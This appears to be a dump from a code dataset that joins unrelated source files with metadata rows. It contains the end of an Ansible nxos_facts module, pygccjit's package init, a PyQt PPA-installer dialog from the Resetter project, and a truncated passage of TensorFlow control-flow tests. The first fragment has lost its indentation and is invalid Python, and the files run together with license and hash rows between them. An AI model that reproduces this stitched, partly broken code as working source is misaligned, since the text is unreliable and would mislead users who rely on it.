facts['gather_subset'] = list(runable_subsets)
instances = list()
for key in runable_subsets:
instances.append(FACT_SUBSETS[key](module))
for inst in instances:
inst.populate()
facts.update(inst.facts)
ansible_facts = dict()
for key, value in iteritems(facts):
        # this is to maintain compatibility with nxos_facts 2.1
if key.startswith('_'):
ansible_facts[key[1:]] = value
else:
ansible_facts[key] = value
module.exit_json(ansible_facts=ansible_facts, warnings=warnings)
if __name__ == '__main__':
main()
| gpl-3.0 | -7,538,972,090,280,520,000 | 26.785024 | 99 | 0.613057 | false |
vickenty/pygccjit | gccjit/__init__.py | 2 | 2299 | # Copyright 2014 Simon Feltman <[email protected]>
# Copyright 2015 David Malcolm <[email protected]>
# Copyright 2015 Red Hat, Inc.
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from ._gccjit import (Context,
Object,
Result,
RValue,
LValue,
Type,
Location,
Field,
Struct,
Param,
Function,
Block,
FunctionKind,
UnaryOp,
BinaryOp,
Comparison,
StrOption,
IntOption,
BoolOption,
OutputKind,
TypeKind,
GlobalKind,
Error,
)
# Make it easy to make a "main" function:
def make_main(ctxt):
"""
Make "main" function:
int
main (int argc, char **argv)
{
...
}
Return (func, param_argc, param_argv)
"""
int_type = ctxt.get_type(TypeKind.INT)
param_argc = ctxt.new_param(int_type, b"argc")
char_ptr_ptr_type = (
ctxt.get_type(TypeKind.CHAR).get_pointer().get_pointer())
param_argv = ctxt.new_param(char_ptr_ptr_type, b"argv")
func_main = ctxt.new_function(FunctionKind.EXPORTED,
int_type,
b"main",
[param_argc, param_argv])
return (func_main, param_argc, param_argv)
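# A minimal usage sketch for make_main(), kept as a comment so that importing
# this module stays side-effect free.  It assumes the usual pygccjit flow
# (Context(), Function.new_block(), Block.end_with_return(), Context.compile(),
# Result.get_code()); the exact calls below are illustrative assumptions, not
# a definitive part of this module's API.
#
# import gccjit
# ctxt = gccjit.Context()
# func, argc, argv = gccjit.make_main(ctxt)
# block = func.new_block(b"entry")
# int_type = ctxt.get_type(gccjit.TypeKind.INT)
# block.end_with_return(ctxt.new_rvalue_from_int(int_type, 0))
# result = ctxt.compile()
# main_ptr = result.get_code(b"main")  # callable e.g. through ctypes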
| gpl-3.0 | 6,381,630,307,275,011,000 | 33.313433 | 71 | 0.510657 | false |
gaining/Resetter | Resetter/usr/lib/resetter/EasyRepo.py | 1 | 12076 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import apt
import lsb_release
import subprocess
import sys
import textwrap
from PyQt5 import QtCore, QtGui
from aptsources import sourceslist
import urllib.request
import urllib.parse
from bs4 import BeautifulSoup
from AptProgress import UIAcquireProgress
from PackageView import AppView
from Tools import UsefulTools
from PyQt5.QtWidgets import *
class EasyPPAInstall(QDialog):
start_op= QtCore.pyqtSignal(int, bool, str) # Loading progress transmitter
def __init__(self, parent=None):
super(EasyPPAInstall, self).__init__(parent)
self.setWindowTitle("Easy PPA Install")
self.searchEditText = QLineEdit()
self.searchEditText.setPlaceholderText("Search for applications")
self.searchEditText.setMaximumWidth(200)
self.searchbutton = QPushButton()
self.error_msg = QMessageBox()
self.error_msg.setIcon(QMessageBox.Critical)
self.error_msg.setWindowTitle("Error")
        self.closebutton = QPushButton()
self.closebutton.setText('Close')
self.closebutton.setMaximumWidth(150)
self.closebutton.clicked.connect(self.close)
self.searchbutton.setText("Search")
self.searchbutton.setMaximumWidth(100)
self.progressbar = QProgressBar()
self.lbl1 = QLabel()
self.buttonRefresh = QPushButton()
self.buttonRefresh.setText("Refresh sources")
self.isWrittenTo = False
self.table = QTableWidget()
self.configureTable(self.table)
self.searchbutton.clicked.connect(lambda: self.searchForPPA(self.table))
self.buttonRefresh.clicked.connect(self.updateSources)
self.table.verticalHeader().hide()
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.addWidget(self.searchEditText)
self.horizontalLayout.addWidget(self.searchbutton)
self.horizontalLayout.setAlignment(QtCore.Qt.AlignRight)
self.horizontalLayout2 = QHBoxLayout()
self.horizontalLayout2.setAlignment(QtCore.Qt.AlignRight)
self.horizontalLayout2.addWidget(self.progressbar)
self.horizontalLayout2.addWidget(self.buttonRefresh)
self.horizontalLayout2.addWidget(self.closebutton)
self.verticalLayout = QVBoxLayout(self)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout.addWidget(self.table)
self.verticalLayout.addWidget(self.lbl1)
self.verticalLayout.addLayout(self.horizontalLayout2)
self.os_info = lsb_release.get_distro_information()
self.sources = sourceslist.SourcesList()
self.aprogress = UIAcquireProgress(True)
self.thread1 = QtCore.QThread()
self.aprogress.moveToThread(self.thread1)
self.thread1.started.connect(lambda: self.aprogress.play(0.0, False, ""))
self.aprogress.finished.connect(self.thread1.quit)
self.aprogress.run_op.connect(self.updateProgressBar2)
self.ppa = []
self.table_data = []
@QtCore.pyqtSlot(int, bool, str)
def updateProgressBar2(self, percent, isdone, status):
self.lbl1.setText(status)
self.progressbar.setValue(percent)
if isdone:
self.close()
def configureTable(self, table):
table.setColumnCount(4)
table.setHorizontalHeaderItem(0, QTableWidgetItem("Description"))
table.setHorizontalHeaderItem(1, QTableWidgetItem("PPA"))
table.setHorizontalHeaderItem(2, QTableWidgetItem("View Packages within this ppa"))
table.setHorizontalHeaderItem(3, QTableWidgetItem("Add this PPA to your sources"))
table.setMinimumHeight(200)
table.setMinimumWidth(700)
header = table.horizontalHeader()
header.setSectionResizeMode(1, QHeaderView.ResizeToContents)
header.setSectionResizeMode(2, QHeaderView.ResizeToContents)
table.horizontalHeader().setStretchLastSection(True)
def searchForPPA(self, table):
if self.isThereInternet() is False:
self.close()
else:
QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
self.searchbutton.setEnabled(False)
del self.ppa[:]
del self.table_data[:]
search_string = self.searchEditText.text()
            page = urllib.request.urlopen(
                'https://launchpad.net/+search?field.text=' + urllib.parse.quote_plus(search_string))
soup = BeautifulSoup(page, 'html.parser', from_encoding=page.info().get_param('charset'))
found_links = []
match = "+archive"
exclude = ("+packages", "+build", "+sourcepub")
for link in soup.find_all('a', href=True):
real_link = link['href']
if not any(s in real_link for s in exclude) and match in real_link:
found_links.append(real_link)
r = len(found_links)
if r == 0:
self.lbl1.setText("No results found")
else:
self.lbl1.setText("Found {} results".format(r))
table.setRowCount(r)
self.displayLinks(found_links, table)
QApplication.restoreOverrideCursor()
self.searchbutton.setEnabled(True)
def updateSources(self):
self.buttonRefresh.setEnabled(False)
err = False
try:
cache = apt.Cache()
cache.update(self.aprogress)
except Exception as e:
err = True
pass
self.buttonRefresh.setEnabled(True)
if err:
self.lbl1.setText("Update completed but some of your sources are not reachable.")
cache.close()
else:
self.lbl1.setText("Update Complete!")
cache.close()
def displayLinks(self, found_links, table):
loading = 0
x = float(100) / len(found_links) if len(found_links) != 0 else 0
try:
for i, link in enumerate(found_links):
qApp.processEvents()
desc = QTableWidgetItem()
ppa = QTableWidgetItem()
buttonAddPPA = QPushButton()
buttonAddPPA.setText("Install this PPA")
buttonAddPPA.clicked.connect(lambda: self.addPPA(self.ppa))
buttonPackageDetails = QPushButton()
buttonPackageDetails.setText("View packages")
buttonPackageDetails.setEnabled(True)
buttonPackageDetails.clicked.connect(lambda: self.showPackages(self.table_data))
html_text = urllib.request.urlopen(link).read()
soup = BeautifulSoup(html_text, 'html.parser')
ppa.setText(soup.select('strong')[0].text.strip())
desc.setText(textwrap.fill(soup.select('span')[0].text.strip(), 20))
table.setItem(i, 0, desc)
table.setItem(i, 1, ppa)
table.setCellWidget(i, 2, buttonPackageDetails)
table.setCellWidget(i, 3, buttonAddPPA)
repo = soup.find('pre', attrs={'class': 'wrap'})
repo_name = repo.text.strip()
raw = soup.find('code')
raw_key = raw.text.strip()
select_node = soup.findAll('select', attrs={'name': 'field.series_filter'})
self.isCompatible(select_node, repo_name, raw_key)
sauce = soup.find('table', attrs={'class': 'listing sortable'})
self.getTableData(sauce)
loading += x
self.progressbar.setValue(int(loading))
except Exception as e:
QApplication.restoreOverrideCursor()
self.error_msg.setText("Error, please try again.")
self.error_msg.setDetailedText("If this keeps happening, it means easy repo stumbled upon an empty or "
"forbidden link. You might need to change your search string " + str(e))
self.error_msg.exec_()
def isThereInternet(self):
try:
urllib.request.urlopen('http://google.com', timeout=1)
except urllib.request.URLError as e:
print ("There is no internet: {}".format(e))
self.error_msg.setText("You are not connected to the internet")
self.error_msg.setDetailedText("This feature will not work without an internet connection. ")
self.error_msg.exec_()
return False
else:
return True
def codeName(self):
xenial_fam = (['serena', 'sarah', 'loki', 'sonya', 'sylvia'])
bionic_fam = (['tara'])
if self.os_info['CODENAME'] == 'rosa':
return 'trusty'
elif self.os_info['CODENAME'] in xenial_fam:
return 'xenial'
elif self.os_info['CODENAME'] in bionic_fam:
return 'bionic'
else:
return self.os_info['CODENAME']
def isCompatible(self, node, repo, raw):
options = []
        compatible = False
signing_key = str(raw[6:]).split('<', 1)[0]
if node:
for option in node[0].findAll('option'):
option = option.text.strip().lower()
options.append(option)
if self.codeName() in options:
compatible = True
else:
compatible = False
result = (repo, compatible, signing_key)
self.ppa.append(result)
def addPPA(self, ppa):
button = qApp.focusWidget()
index = self.table.indexAt(button.pos())
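        # Each entry in ppa is (repo line, compatible, signing key), as built by isCompatible().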
if index.isValid() and ppa[index.row()][1]:
try:
QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
x = str(ppa[index.row()])
y = str(x[7:]).split(' ', 1)[0]
entry = ('deb', y, self.codeName(), ['main'])
self.sources.add(*entry)
self.sources.save()
p = subprocess.check_output(
['apt-key', 'adv', '--keyserver', 'keyserver.ubuntu.com', '--recv-keys', ppa[index.row()][2]]
)
print(p)
QApplication.restoreOverrideCursor()
except Exception as e:
QApplication.restoreOverrideCursor()
UsefulTools().showMessage("Unable to fetch PPA key", "Error: {}".format(e), QMessageBox.Critical)
else:
UsefulTools().showMessage("PPA added", "This ppa has been successfully added to your sources list",
QMessageBox.Information)
else:
UsefulTools().showMessage("PPA not compatible", "This PPA is not compatible with your system because it's "
"not available for {}".format(self.os_info['DESCRIPTION']),
QMessageBox.Information)
def getTableData(self, sauce):
pasta = []
for i in sauce.select('tr'):
data = i.select('td')
if data:
package = data[0].text.strip()
version = ' '.join(data[1].text.strip().split())
pasta_sauce = "{}: {}".format(package, version)
pasta.append(pasta_sauce)
self.table_data.append(pasta)
def showPackages(self, sauce):
QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
button = qApp.focusWidget()
index = self.table.indexAt(button.pos())
if index.isValid():
available = AppView(self)
text = "These packages are available from the selected ppa"
            if index.row() < len(sauce):
available.showView(sauce[index.row()], "PPA Packages", text, False)
available.show()
QApplication.restoreOverrideCursor()
if __name__ == '__main__':
app = QApplication(sys.argv)
about = EasyPPAInstall()
about.show()
sys.exit(app.exec_())
| gpl-3.0 | 1,778,202,608,526,870,300 | 41.822695 | 119 | 0.596472 | false |
Bismarrck/tensorflow | tensorflow/python/kernel_tests/control_flow_ops_py_test.py | 1 | 151440 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-long-lambda
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import sys
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as eager_function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_logging_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import while_v2 # pylint: disable=unused-import
# pylint: disable=unused-import
import tensorflow.python.ops.tensor_array_grad
# pylint: enable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import nest
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def all_fetchables():
tensor_names = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.outputs:
if graph.is_fetchable(t):
tensor_names.append(t.name)
return tensor_names
def all_feedables():
feedable_tensors = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_feedable(t):
feedable_tensors.append(t)
return feedable_tensors
def opt_cfg():
return config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L1,
do_function_inlining=True,
do_constant_folding=True)))
def isum(s, maximum_iterations=None):
  """Adds 0 + 1 + ... + 9 to s with a while_loop (optionally capped)."""
i = constant_op.constant(0, name="i")
c = lambda i, s: math_ops.less(i, 10)
b = lambda i, s: [math_ops.add(i, 1), math_ops.add(i, s)]
_, r_s = control_flow_ops.while_loop(
c, b, [i, s], maximum_iterations=maximum_iterations)
return r_s
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
@test_util.run_v1_only("b/120545219")
def testRefIdentity(self):
with self.cached_session():
v = variables.VariableV1(7)
v = control_flow_ops._Identity(v)
op = state_ops.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(isinstance(v2, ops.Tensor))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(9, self.evaluate(v2))
@test_util.run_v1_only("b/120545219")
def testRefEnter(self):
with self.cached_session():
v = variables.VariableV1(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = constant_op.constant(9)
enter_nine = gen_control_flow_ops.enter(nine, "foo_1")
op = state_ops.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(9, self.evaluate(v3))
@test_util.run_v1_only("b/120545219")
def testRefSwitch(self):
with self.cached_session():
v = variables.VariableV1(7)
p = constant_op.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v._ref(), p) # pylint: disable=protected-access
v2 = state_ops.assign(v1[1], 9)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(9, self.evaluate(v2))
def testEnterMulExit(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = gen_control_flow_ops.enter(data, "foo_1", False)
five = constant_op.constant(5)
enter_five = gen_control_flow_ops.enter(five, "foo_1", False)
mul_op = math_ops.multiply(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = self.evaluate(exit_op)
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
@test_util.run_deprecated_v1
def testEnterShapePropagation(self):
with self.cached_session():
v = variables.Variable([0.0, 0.0], dtype=dtypes.float32)
# If is_constant=True, the shape information should be propagated.
enter_v_constant = gen_control_flow_ops.enter(
v, "frame1", is_constant=True)
self.assertEqual(enter_v_constant.shape, [2])
# Otherwise, the shape should be unknown.
enter_v_non_constant = gen_control_flow_ops.enter(
v, "frame2", is_constant=False)
self.assertEqual(enter_v_non_constant.shape, None)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([1, 2, 3, 4, 5, 6])
indices = constant_op.constant([0, 2, 4, 6, 8, 10])
data = ops.IndexedSlices(values, indices)
pred = ops.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values
ind = merge_op.indices
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
@test_util.run_v1_only("b/120545219")
def testSwitchDeadBranch(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = array_ops.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Retval[0] does not have value" in str(e)):
self.evaluate(dead_branch)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeLess(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
zero = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
less_op = math_ops.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = self.evaluate(merge_op)
self.assertAllEqual(np.arange(1, 7), result)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeAddIdentity(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
id_op = array_ops.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = self.evaluate(merge_op)
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeAddMul(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
five = constant_op.constant(5)
mul_op = math_ops.multiply(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = self.evaluate(merge_op)
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
@test_util.run_v1_only("b/120545219")
def testLoop_false(self):
with self.cached_session():
false = ops.convert_to_tensor(False)
n = constant_op.constant(10)
enter_false = gen_control_flow_ops.enter(false, "foo_1", False)
enter_n = gen_control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = self.evaluate(exit_n)
self.assertAllEqual(10, result)
@test_util.run_deprecated_v1
def testLoop_1(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
with ops.device(test.gpu_device_name()):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = self.evaluate(exit_i)
self.assertAllEqual(10, result)
@test_util.run_v1_only("b/120545219")
def testLoop_2(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
with ops.device(test.gpu_device_name()):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = self.evaluate(exit_i)
self.assertAllEqual(10, result)
@test_util.run_v1_only("b/120545219")
def testDifferentFrame(self):
with self.cached_session():
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = gen_control_flow_ops.enter(data, "foo_1", False)
enter_2 = gen_control_flow_ops.enter(data, "foo_2", False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError("has inputs from different frames"):
res.eval(feed_dict={data: 1.0})
@test_util.run_deprecated_v1
def testCondBool(self):
values = constant_op.constant(10)
fn1 = lambda: math_ops.add(values, 1)
fn2 = lambda: math_ops.subtract(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = control_flow_ops.cond(False, fn1, fn2)
@test_util.run_deprecated_v1
def testCondInt(self):
p = array_ops.placeholder(dtypes.bool, shape=[])
v = constant_op.constant(10)
fn1 = lambda: math_ops.add(v, 1)
fn2 = lambda: math_ops.subtract(v, 1)
y = control_flow_ops.cond(p, fn1, fn2)
grad = gradients_impl.gradients(y, [v])
self.assertAllEqual([None], grad)
def testCondOutputShape(self):
x = constant_op.constant(1.0)
b = control_flow_ops.cond(
constant_op.constant(True), lambda: math_ops.square(x),
lambda: math_ops.subtract(x, 1.))
self.assertEqual(b.shape, tensor_shape.scalar())
@test_util.run_v1_only("b/120545219")
def testFetchable(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
control_flow_ops.cond(
constant_op.constant(True), lambda: x + 2, lambda: x + 0)
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_fetchable(t.op):
sess.run(t, feed_dict={x: 3})
else:
with self.assertRaisesRegexp(ValueError,
"has been marked as not fetchable"):
sess.run(t, feed_dict={x: 3})
@test_util.disable_control_flow_v2("Not relevant")
@test_util.run_v1_only("b/120545219")
def testFeedable(self):
with self.cached_session() as sess:
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
self.assertEqual(1000, r.eval(feed_dict={i0: 0}))
feedable_tensors = all_feedables()
for t in feedable_tensors:
sess.run(r, feed_dict={t: 3})
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if t not in feedable_tensors and t.dtype is dtypes.int32:
with self.assertRaisesRegexp(ValueError, "may not be fed"):
sess.run(r, feed_dict={t: 3})
@test_util.run_v1_only("b/120545219")
def testCondIndexedSlices(self):
with self.cached_session():
values = constant_op.constant(10)
indices = constant_op.constant(0)
x = ops.IndexedSlices(values, indices)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), indices)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), indices)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values
ind = r.indices
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
@test_util.run_v1_only("b/120545219")
def testCondSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
pred = math_ops.less(1, 2)
fn1 = lambda: sparse_tensor.SparseTensor(
indices + 1, x.values + 1, dense_shape=shape)
fn2 = lambda: sparse_tensor.SparseTensor(
indices, x.values - 1, dense_shape=shape)
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([3.0, 5.0], r.values)
self.assertAllEqual([[1], [4]], r.indices)
self.assertAllEqual(r.values.get_shape(), (2,))
@test_util.run_v1_only("b/120545219")
def testCondResource(self):
with self.cached_session():
rv = resource_variable_ops.ResourceVariable(True)
self.evaluate(variables.global_variables_initializer())
t = ops.convert_to_tensor(1.0)
def case():
assign = resource_variable_ops.assign_variable_op(rv.handle, False)
with ops.control_dependencies([assign]):
return array_ops.identity(t)
self.assertEqual(
1.0, self.evaluate(control_flow_ops.cond(rv, case, lambda: t)))
@test_util.run_v1_only("b/120545219")
def testCondWithTensorArrayGrad(self):
with self.cached_session() as sess:
with ops.device(test.gpu_device_name()):
pred = array_ops.placeholder(dtypes.bool, [])
x = constant_op.constant([1.0, 2.0, 3.0])
y = control_flow_ops.cond(
pred, lambda: functional_ops.map_fn(lambda z: z * 2.0, x),
lambda: constant_op.constant([1.0, 1.0, 1.0]))
g = gradients_impl.gradients(y, x)[0]
self.assertAllEqual(sess.run(g, {pred: True}), [2.0, 2.0, 2.0])
self.assertAllEqual(sess.run(g, {pred: False}), [0.0, 0.0, 0.0])
@test_util.disable_control_flow_v2("b/113293074")
@test_util.run_v1_only("b/120545219")
def testCondIndexedSlicesDifferentTypes(self):
with self.cached_session():
values = constant_op.constant(10)
i_32 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int32)
i_64 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int64)
x = ops.IndexedSlices(values, i_32)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), i_32)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), i_64)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values
ind = r.indices
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
@test_util.run_v1_only("b/120545219")
def testCondColocation(self):
with self.session(use_gpu=True):
with ops.device("/cpu:0"):
v = variables.Variable(7.0)
x = constant_op.constant(10.0)
pred = math_ops.less(1.0, 2.0)
fn1 = lambda: math_ops.add(v, 1.0)
fn2 = lambda: math_ops.subtract(x, 1.0)
r = control_flow_ops.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
r = control_flow_ops.cond(pred, fn1, fn2)
result = self.evaluate(r)
self.assertAllEqual(11, result)
def testCond_1(self):
self._testCond_1(use_gpu=False)
# TODO(b/116526896): Enable GPU tests.
# self._testCond_1(use_gpu=True)
def testCond_2(self):
with self.cached_session():
x = constant_op.constant(10)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
result = self.evaluate(r)
self.assertAllEqual(9, result)
def testCond_3(self):
with self.cached_session():
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
fn3 = lambda: math_ops.add(control_flow_ops.cond(pred, fn1, fn2), 1)
r = control_flow_ops.cond(pred, fn3, fn2)
result = self.evaluate(r)
self.assertAllEqual(12, result)
@test_util.run_in_graph_and_eager_modes
def testCondPruning(self):
v1 = variables.Variable(7)
v2 = variables.Variable(7)
v3 = variables.Variable(7)
def f():
age = constant_op.constant(3)
max_age = constant_op.constant(2)
pred = math_ops.greater(age, max_age)
fn1 = lambda: [state_ops.assign(v1, 1).op, state_ops.assign(v2, 2).op]
fn2 = lambda: [state_ops.assign(v3, 3).op, constant_op.constant(10).op]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertEqual(len(r), 2)
return r[1]
f_defun = eager_function.defun(f)
if not context.executing_eagerly():
with self.cached_session():
self.evaluate(variables.global_variables_initializer())
result = self.evaluate(f())
self.assertEqual(True, result)
# Only second cond result was fetched, so v1 assign shouldn't run.
self.assertEqual(7, self.evaluate(v1))
self.assertEqual(2, self.evaluate(v2))
self.assertEqual(7, self.evaluate(v3))
result = f_defun()
self.assertEqual(True, self.evaluate(result))
# Both v1 and v2 branch assignments should be run in defun.
self.assertEqual(1, self.evaluate(v1))
self.assertEqual(2, self.evaluate(v2))
self.assertEqual(7, self.evaluate(v3))
def testCond_5(self):
